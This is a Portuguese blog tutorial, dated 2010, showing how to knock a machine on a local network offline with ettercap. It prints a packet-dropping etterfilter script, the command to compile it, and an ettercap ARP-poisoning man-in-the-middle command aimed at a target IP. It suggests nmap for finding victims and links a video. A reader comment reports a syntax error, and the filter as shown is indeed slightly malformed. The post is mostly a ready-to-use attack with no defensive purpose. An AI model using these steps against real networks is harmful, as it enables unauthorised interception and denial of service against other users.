Denial Of Service (DOS) com ettercap

Posted: 04 julho 2010 by Bhior in
2

Um ataque de negação de serviço (também conhecido como DoS - Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores.

Na vídeo aula e passada dentro de um ambiente de rede interna, no meu caso eu ja sabia qual o endereço de ip da maquina a qual eu quero usar o ataque, mas você podem usar ferramentas de rede para identificar maquinas que estão ligadas no momento para um possível ataque, ex: de uma ferramenta muito utilizado e o nmap, lembrando que existe inúmeras ferramentas para esse fim.


Primeiro passo -> Criar uma arquivo com a extensão .eft, no caso especifico eu coloquei o nome de dos.eft que poderia ser qualquer nome.

if (ip.src == 'IP do alvo' || ip.dst 'IP do alvo') {
drop();
kill();
msg("Mensagem que sera imprimida na tela\n");
}

Segundo passo -> Temos que compilar o arquivo com o filtro do ettercap, para que o mesmo possa executar o arquivo. Então abram o terminal e digite a seguinte sintaxe de comando:
OBS: Olhe para o local onde foi salvo o arquivo, no meu caso foi na pasta "root", minha area de trabalho.

# etterfilter dos.eft -o dos.ef

Terceiro passo -> Vamos da inicio ao ataque, usando o ettercap:

# ettercap -T -q -F /local.do.arquivo/dos.ef -M arp /IP do alvo/ // -i etho

Obs: eth0 - e minha interface de rede.


Volia, se o host alvo tentar acessar a internet, estava impedido de executar tal função.... rsrs


O que acontece?

Faço o MITM com ettercap e uso o filtro que eu criei o dos.ef, quando o host alvo faz uma solicitação, o ettercap simplesmente descarta os pacotes e não deixa os mesmo chegarem ao destino... com isso temos uma negação de serviço.

Baixar:
http://www.4shared.com/file/knAfoYZE/Denial_Of_Service_ettercap_.html

Assisti on-line:




2 comentários:

  1. Anônimo says:

    e quando ocorri isso:?

    Parsing source file 'DoS.eft'
    [DoS.eft:1]: syntax error, unexpected ''', expecting integer or ip address or string

    Brigado!

  1. Bhior says:

    @Anônimo,

    Você errou na sintaxe da linha 1.
    Por isso o código não pode ser compilado

    []'